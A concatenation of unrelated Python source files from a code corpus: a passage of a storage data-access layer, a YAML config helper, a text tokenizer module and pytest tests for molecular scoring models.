Instantiated DAL driver used for backend storage for entities
Attributes
----------
driver_type : str
driver_options : dict
driver : datmo.core.storage.driver.DALDriver
Instantiated DAL driver used for backend storage for entities
is_initialized : bool
model : ModelMethods
code : CodeMethods
environment : EnvironmentMethods
file_collection : FileCollectionMethods
task : TaskMethods
snapshot : SnapshotMethods
user : UserMethods
Methods
-------
init()
initialize the dal
"""
def __init__(self, driver_type, driver_options, driver=None):
self.driver_type = driver_type
self.driver_options = driver_options
self.driver = driver
self._is_initialized = self.is_initialized
@property
def is_initialized(self):
if os.path.isdir(self.driver_options['connection_string']):
self._is_initialized = True
# set the driver so it is available
if not self.driver:
if self.driver_type == "blitzdb":
self.driver = BlitzDBDALDriver(**self.driver_options)
return self._is_initialized
self._is_initialized = False
return self._is_initialized
@property
def model(self):
"""Model CRUD methods
Returns
-------
ModelMethods
Specific set of CRUD functions for model
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return ModelMethods(self.driver)
@property
def code(self):
"""Code CRUD methods
Returns
-------
CodeMethods
Specific set of CRUD functions for code
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return CodeMethods(self.driver)
@property
def environment(self):
"""Environment CRUD methods
Returns
-------
EnvironmentMethods
Specific set of CRUD functions for environment
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return EnvironmentMethods(self.driver)
@property
def file_collection(self):
"""FileCollection CRUD methods
Returns
-------
FileCollectionMethods
Specific set of CRUD functions for file collection
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return FileCollectionMethods(self.driver)
@cache
@property
def task(self):
"""Task CRUD methods
Returns
-------
TaskMethods
Specific set of CRUD functions for task
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return TaskMethods(self.driver)
@cache
@property
def snapshot(self):
"""Snapshot CRUD methods
Returns
-------
SnapshotMethods
Specific set of CRUD functions for snapshot
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return SnapshotMethods(self.driver)
@cache
@property
def user(self):
"""User CRUD methods
Returns
-------
UserMethods
Specific set of CRUD functions for user
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return UserMethods(self.driver)
def init(self):
if not self.driver:
if self.driver_type == "blitzdb":
self.driver = BlitzDBDALDriver(**self.driver_options)
class EntityMethodsCRUD(object):
def __init__(self, collection, entity_class, driver):
self.collection = collection
self.entity_class = entity_class
self.driver = driver
def get_by_id(self, entity_id):
obj = self.driver.get(self.collection, entity_id)
return self.entity_class(obj)
def get_by_shortened_id(self, shortened_entity_id):
obj = self.driver.get_by_shortened_id(self.collection,
shortened_entity_id)
return self.entity_class(obj)
def create(self, datmo_entity):
# translate datmo_entity to a standard dictionary (document) to be stored
if hasattr(datmo_entity, 'to_dictionary'):
dict_obj = datmo_entity.to_dictionary()
else:
dict_obj = self.entity_class(datmo_entity).to_dictionary()
# create a unique hash from misc_functions.py
# TODO: find efficient way to get previous hash for entity
# latest_entity = self.query({"id": latest})
# dict_obj['id'] = create_unique_hash(base_hash=latest_entity['id'])
dict_obj['id'] = dict_obj['id'] if 'id' in dict_obj.keys() and dict_obj['id'] else \
create_unique_hash()
response = self.driver.set(self.collection, dict_obj)
entity_instance = self.entity_class(response)
return entity_instance
def update(self, datmo_entity):
# translate datmo_entity to a standard dictionary (document) to be stored
if hasattr(datmo_entity, 'to_dictionary'):
dict_obj = datmo_entity.to_dictionary()
else:
if 'id' not in list(datmo_entity) or not datmo_entity['id']:
raise InputError(__("error", "storage.local.dal.update"))
# Aggregate original object and new object into dict_obj var
new_dict_obj = datmo_entity
original_datmo_entity = self.get_by_id(datmo_entity['id'])
dict_obj = {}
for key, value in original_datmo_entity.to_dictionary().items():
if key in list(new_dict_obj):
dict_obj[key] = new_dict_obj[key]
else:
dict_obj[key] = getattr(original_datmo_entity, key)
# set updated_at always
dict_obj['updated_at'] = datetime.utcnow()
response = self.driver.set(self.collection, dict_obj)
entity_instance = self.entity_class(response)
return entity_instance
def delete(self, entity_id):
return self.driver.delete(self.collection, entity_id)
def query(self, query_params, sort_key=None, sort_order=None):
return [
self.entity_class(item) for item in self.driver.query(
self.collection, query_params, sort_key, sort_order)
]
def findOne(self, query_params):
results = self.query(query_params)
if len(results) == 0:
raise EntityNotFound()
if len(results) > 1:
raise MoreThanOneEntityFound()
return results[0]
#
# https://stackoverflow.com/questions/1713038/super-fails-with-error-typeerror-argument-1-must-be-type-not-classobj
#
#
# Datmo Entity methods
#
class ModelMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(ModelMethods, self).__init__('model', Model, driver)
class CodeMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(CodeMethods, self).__init__('code', Code, driver)
class EnvironmentMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(EnvironmentMethods, self).__init__('environment', Environment,
driver)
class FileCollectionMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(FileCollectionMethods, self).__init__('file_collection',
FileCollection, driver)
class TaskMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(TaskMethods, self).__init__('task', Task, driver)
class SnapshotMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(SnapshotMethods, self).__init__('snapshot', Snapshot, driver)
class UserMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(UserMethods, self).__init__('user', User, driver)
|
rl_algorithms/utils/config.py | medipixel/rl_algorithms | 466 | 32948 | <gh_stars>100-1000
import collections.abc as collections_abc
import os.path as osp
from addict import Dict
import yaml
class ConfigDict(Dict):
def __missing__(self, name):
raise KeyError(name)
def __getattr__(self, name):
try:
value = super(ConfigDict, self).__getattr__(name)
except KeyError:
ex = AttributeError(
"'{}' object has no attribute '{}'".format(
self.__class__.__name__, name
)
)
except Exception as e:
ex = e
else:
return value
raise ex
def __setitem__(self, name, value):
if isinstance(value, dict):
value = ConfigDict(value)
super(ConfigDict, self).__setitem__(name, value)
def add_args(parser, cfg, prefix=""):
for k, v in cfg.items():
if isinstance(v, str):
parser.add_argument("--" + prefix + k)
elif isinstance(v, int):
parser.add_argument("--" + prefix + k, type=int)
elif isinstance(v, float):
parser.add_argument("--" + prefix + k, type=float)
elif isinstance(v, bool):
parser.add_argument("--" + prefix + k, action="store_true")
elif isinstance(v, dict):
add_args(parser, v, k + ".")
elif isinstance(v, collections_abc.Iterable):
parser.add_argument("--" + prefix + k, type=type(v[0]), nargs="+")
else:
print("connot parse key {} of type {}".format(prefix + k, type(v)))
return parser
class YamlConfig:
"""Manager of ConfigDict from yaml."""
def __init__(self, config_paths: dict):
"""Make ConfigDict from yaml path."""
self.cfg = ConfigDict()
for key, path in config_paths.items():
self.cfg[key] = self._yaml_to_config_dict(path)
@staticmethod
def _yaml_to_config_dict(path: str) -> ConfigDict:
"""Return ConfigDict from yaml."""
try:
with open(path) as f:
data = yaml.load(f, Loader=yaml.FullLoader)
except FileNotFoundError:
with open(osp.expanduser(path)) as f:
data = yaml.load(f, Loader=yaml.FullLoader)
return ConfigDict(data)
def get_config_dict(self):
return self.cfg
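# Illustrative usage (a sketch; the yaml path and the keys below are placeholders,
# not files or fields guaranteed to exist in this repository):
#
#   cfg = YamlConfig({"agent": "configs/example/agent.yaml"}).get_config_dict()
#   hyper_params = cfg.agent.hyper_params   # attribute-style access via ConfigDict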
|
passage/preprocessing.py | vishalbelsare/Passage | 597 | 32950 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import string
from collections import Counter
import numpy as np
import theano
import theano.tensor as T
punctuation = set(string.punctuation)
punctuation.add('\n')
punctuation.add('\t')
punctuation.add(u'’')
punctuation.add(u'‘')
punctuation.add(u'“')
punctuation.add(u'”')
punctuation.add(u'´')
punctuation.add('')
def one_hot(X, n=None, negative_class=0.):
X = np.asarray(X).flatten()
if n is None:
n = np.max(X) + 1
Xoh = np.ones((len(X), n)) * negative_class
Xoh[np.arange(len(X)), X] = 1.
return Xoh
def flatten(l):
return [item for sublist in l for item in sublist]
def lbf(l,b):
return [el for el, condition in zip(l, b) if condition]
def list_index(l, idxs):
return [l[idx] for idx in idxs]
def tokenize(text):
tokenized = []
w = ''
for t in text:
if t in punctuation:
tokenized.append(w)
tokenized.append(t)
w = ''
elif t == ' ':
tokenized.append(w)
w = ''
else:
w += t
if w != '':
tokenized.append(w)
tokenized = [token for token in tokenized if token]
return tokenized
def token_encoder(texts, max_features=9997, min_df=10):
df = {}
for text in texts:
tokens = set(text)
for token in tokens:
if token in df:
df[token] += 1
else:
df[token] = 1
    k, v = list(df.keys()), np.asarray(list(df.values()))
valid = v >= min_df
k = lbf(k, valid)
v = v[valid]
sort_mask = np.argsort(v)[::-1]
k = list_index(k, sort_mask)[:max_features]
v = v[sort_mask][:max_features]
xtoi = dict(zip(k, range(3, len(k)+3)))
return xtoi
def standardize_targets(Y, cost):
Y = np.asarray(Y)
ndim = len(Y.shape)
if ndim == 1:
Y = Y.reshape(-1, 1)
if Y.shape[1] == 1 and cost.__name__ == 'CategoricalCrossEntropy':
Y = one_hot(Y, negative_class=0.)
if Y.shape[1] == 1 and 'Hinge' in cost.__name__:
if len(np.unique(Y)) > 2:
Y = one_hot(Y, negative_class=-1.)
else:
Y[Y==0] -= 1
return Y
class Tokenizer(object):
"""
For converting lists of text into tokens used by Passage models.
max_features sets the maximum number of tokens (all others are mapped to UNK)
min_df sets the minimum number of documents a token must appear in to not get mapped to UNK
lowercase controls whether the text is lowercased or not
character sets whether the tokenizer works on a character or word level
Usage:
>>> from passage.preprocessing import Tokenizer
>>> example_text = ['This. is.', 'Example TEXT', 'is text']
>>> tokenizer = Tokenizer(min_df=1, lowercase=True, character=False)
>>> tokenized = tokenizer.fit_transform(example_text)
>>> tokenized
[[7, 5, 3, 5], [6, 4], [3, 4]]
>>> tokenizer.inverse_transform(tokenized)
['this . is .', 'example text', 'is text']
"""
def __init__(self, max_features=9997, min_df=10, lowercase=True, character=False):
self.max_features = max_features
self.min_df = min_df
self.lowercase = lowercase
self.character = character
def fit(self, texts):
if self.lowercase:
texts = [text.lower() for text in texts]
if self.character:
tokens = [list(text) for text in texts]
else:
tokens = [tokenize(text) for text in texts]
self.encoder = token_encoder(tokens, max_features=self.max_features-3, min_df=self.min_df)
self.encoder['PAD'] = 0
self.encoder['END'] = 1
self.encoder['UNK'] = 2
self.decoder = dict(zip(self.encoder.values(), self.encoder.keys()))
self.n_features = len(self.encoder)
return self
def transform(self, texts):
if self.lowercase:
texts = [text.lower() for text in texts]
if self.character:
texts = [list(text) for text in texts]
else:
texts = [tokenize(text) for text in texts]
tokens = [[self.encoder.get(token, 2) for token in text] for text in texts]
return tokens
def fit_transform(self, texts):
self.fit(texts)
tokens = self.transform(texts)
return tokens
def inverse_transform(self, codes):
if self.character:
joiner = ''
else:
joiner = ' '
return [joiner.join([self.decoder[token] for token in code]) for code in codes]
class LenFilter(object):
def __init__(self, max_len=1000, min_max_len=100, percentile=99):
self.max_len = max_len
self.percentile = percentile
self.min_max_len = min_max_len
def filter(self, *data):
lens = [len(seq) for seq in data[0]]
if self.percentile > 0:
max_len = np.percentile(lens, self.percentile)
max_len = np.clip(max_len, self.min_max_len, self.max_len)
else:
max_len = self.max_len
valid_idxs = [i for i, l in enumerate(lens) if l <= max_len]
if len(data) == 1:
return list_index(data[0], valid_idxs)
else:
return tuple([list_index(d, valid_idxs) for d in data])
|
tests/test_models.py | lmacaya/oddt | 264 | 32954 | import pickle
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
import pytest
from oddt.scoring.models import classifiers, regressors
@pytest.mark.filterwarnings('ignore:Stochastic Optimizer')
@pytest.mark.parametrize('cls',
[classifiers.svm(probability=True),
classifiers.neuralnetwork(random_state=42)])
def test_classifiers(cls):
# toy data
X = np.concatenate((np.zeros((5, 2)), np.ones((5, 2))))
Y = np.concatenate((np.ones(5), np.zeros(5)))
np.random.seed(42)
cls.fit(X, Y)
assert_array_equal(cls.predict(X), Y)
assert cls.score(X, Y) == 1.0
prob = cls.predict_proba(X)
assert_array_almost_equal(prob, [[0, 1]] * 5 + [[1, 0]] * 5, decimal=1)
log_prob = cls.predict_log_proba(X)
assert_array_almost_equal(np.log(prob), log_prob)
pickled = pickle.dumps(cls)
reloaded = pickle.loads(pickled)
prob_reloaded = reloaded.predict_proba(X)
assert_array_almost_equal(prob, prob_reloaded)
@pytest.mark.parametrize('reg',
[regressors.svm(C=10),
regressors.randomforest(random_state=42),
regressors.neuralnetwork(solver='lbfgs',
random_state=42,
hidden_layer_sizes=(20, 20)),
regressors.mlr()])
def test_regressors(reg):
X = np.vstack((np.arange(30, 10, -2, dtype='float64'),
np.arange(100, 90, -1, dtype='float64'))).T
Y = np.arange(10, dtype='float64')
np.random.seed(42)
reg.fit(X, Y)
pred = reg.predict(X)
assert (np.abs(pred.flatten() - Y) < 1).all()
assert reg.score(X, Y) > 0.9
pickled = pickle.dumps(reg)
reloaded = pickle.loads(pickled)
pred_reloaded = reloaded.predict(X)
assert_array_almost_equal(pred, pred_reloaded)
|